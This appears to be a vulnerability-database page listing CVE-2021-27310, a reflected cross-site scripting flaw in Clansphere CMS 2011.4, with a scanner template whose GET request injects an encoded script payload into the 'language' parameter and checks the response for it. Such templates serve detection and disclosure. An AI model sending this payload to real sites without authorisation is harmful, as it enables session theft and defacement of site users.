CVE-2021-27310: Clansphere CMS 2011.4 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Clansphere CMS 2011.4 | POC: 已公开

漏洞描述

Clansphere CMS 2011.4 contains an unauthenticated reflected cross-site scripting vulnerability via the "language" parameter.

PoC代码[已公开]

id: CVE-2021-27310

info:
  name: Clansphere CMS 2011.4 - Cross-Site Scripting
  author: alph4byt3
  severity: medium
  description: Clansphere CMS 2011.4 contains an unauthenticated reflected cross-site scripting vulnerability via the "language" parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor.
  reference:
    - https://github.com/xoffense/POC/blob/main/Clansphere%202011.4%20%22language%22%20xss.md
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27310
    - https://nvd.nist.gov/vuln/detail/CVE-2021-27310
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-27310
    cwe-id: CWE-79
    epss-score: 0.04092
    epss-percentile: 0.88144
    cpe: cpe:2.3:a:csphere:clansphere:2011.4:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: csphere
    product: clansphere
  tags: cve2021,cve,xss,clansphere,csphere

http:
  - method: GET
    path:
      - '{{BaseURL}}/clansphere/mods/clansphere/lang_modvalidate.php?language=language%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&module=module'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a004630440220290e3e6cdb9b6eb2e6928660a00470dabb03aec0bfb327fae99e2c66b789a72a02201fda914d8c88edaf95b7a9dee6c639c06cb12d0126ff85de66f4456848685adf:922c64590222798bb761d5b6d8e72950